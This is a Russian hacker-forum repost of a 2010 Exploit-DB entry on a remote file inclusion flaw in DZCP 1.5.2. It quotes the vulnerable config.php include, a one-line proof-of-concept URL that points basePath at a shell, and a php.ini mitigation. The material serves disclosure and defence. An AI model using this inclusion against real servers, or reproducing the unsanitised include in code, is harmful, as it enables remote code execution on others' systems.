Exploit DZCP (deV!L`z Clanportal) 1.5.2 - Remote File Inclusion

  • Автор темы Exploiter
  • Дата начала
  • Просмотров 2047 Просмотров

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
11735
Проверка EDB
  1. Пройдено
Автор
CR4WL3R
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2010-0966
Дата публикации
2010-03-14
PHP:
[+]  deV!L`z Clanportal 1.5.2 Remote File Include Vulnerability
[+] Discovered By: cr4wl3r
[+] Download: http://www.dzcp.de/downloads/?action=download&id=131
[x] Code in [dzcp1.5.2/inc/config.php]

## REQUIRES ##
require_once($basePath."/inc/mysql.php");  <--- RFI

function show($tpl, $array)
{
  global $tmpdir;
    $template = "../inc/_templates_/".$tmpdir."/".$tpl;
  
    if($fp = @fopen($template.".".html, "r"))
      $tpl = @fread($fp, filesize($template.".".html));
    
    $array['dir'] = '../inc/_templates_/'.$tmpdir;
    foreach($array as $value => $code)
    {
      $tpl = str_replace('['.$value.']', $code, $tpl);
    }
  return $tpl;
}

[+] PoC: [path]/inc/config.php?basePath=[Shell]

[+] Solution: Change php.ini and set allow_url_fopen to Off
 
Источник
www.exploit-db.com

Похожие темы